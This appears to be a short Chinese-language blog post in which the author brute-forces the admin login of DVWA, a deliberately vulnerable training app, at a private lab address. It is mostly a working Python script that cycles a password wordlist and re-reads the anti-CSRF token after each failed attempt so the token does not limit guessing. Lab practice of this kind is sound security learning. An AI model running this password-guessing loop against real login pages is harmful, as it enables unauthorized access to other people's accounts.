闲来无事,决定试试用Python爆破dvwa登录界面
代码如下:
import datetime
import requests
from bs4 import BeautifulSoup
def Login_brute(filename):
    """Submit every line of *filename* as the ``admin`` password to a DVWA login form.

    The function fetches the login page once to obtain the ``user_token``
    anti-CSRF value, then posts one login attempt per line of the wordlist,
    printing a success or failure message for each attempt.

    Behaviour worth knowing when reading the output:

    * Any response that does not contain the text ``Login failed`` is
      reported as a success, and the loop keeps going afterwards.
    * After each failure the token is re-read from the response page, so the
      per-request ``user_token`` does not limit the number of guesses.
      Server-side, throttling or account lockout is what bounds this loop,
      not the CSRF token.
    * On the wire this is one session issuing sequential POSTs to
      ``login.php`` with the constant User-Agent ``HAHA``; the initial GET is
      sent with the default ``requests`` User-Agent.

    Args:
        filename: Path of a text file with one candidate password per line.
    """
    # Hard-coded lab target (private 192.168.0.0/16 address).
    url = 'http://192.168.57.200/login.php'
    post_headers = {'User-Agent': 'HAHA'}
    failure_template = "用户名:admin,密码:{}登录失败"
    success_template = "用户名:admin,密码:{}登录成功"

    def read_user_token(markup):
        # The token lives in <input name="user_token" value="...">.
        # NOTE(review): find() returns None when the field is missing, in
        # which case .get raises AttributeError — unchanged from the original.
        form_page = BeautifulSoup(markup, 'lxml')
        return form_page.find('input', {'name': 'user_token'}).get('value')

    # A Session keeps the cookies the token is tied to across requests.
    session = requests.Session()
    first_page = session.get(url)
    first_page.encoding = 'UTF-8'
    csrf_token = read_user_token(first_page.text)

    with open(filename, 'r') as wordlist:
        for raw_line in wordlist.readlines():
            # Drop the trailing newline and any surrounding whitespace.
            password = raw_line.strip()
            form_fields = {
                'username': 'admin',
                'password': password,
                'Login': 'Login',
                'user_token': csrf_token,
            }
            response = session.post(url=url, headers=post_headers, data=form_fields)
            response.encoding = 'UTF-8'
            page = response.text

            if 'Login failed' not in page:
                print(success_template.format(password))
                continue

            # A failed attempt returns a fresh login form; pick up its token
            # for the next request before reporting the failure.
            csrf_token = read_user_token(page)
            print(failure_template.format(password))
if __name__ == '__main__':
    # Wall-clock timing around the whole wordlist run.
    started_at = datetime.datetime.now()
    print("show time")
    Login_brute('pd.txt')
    elapsed = datetime.datetime.now() - started_at
    # timedelta.seconds is the whole-seconds component only; any days part
    # and the microseconds are not included in the printed value.
    print("时间:", elapsed.seconds)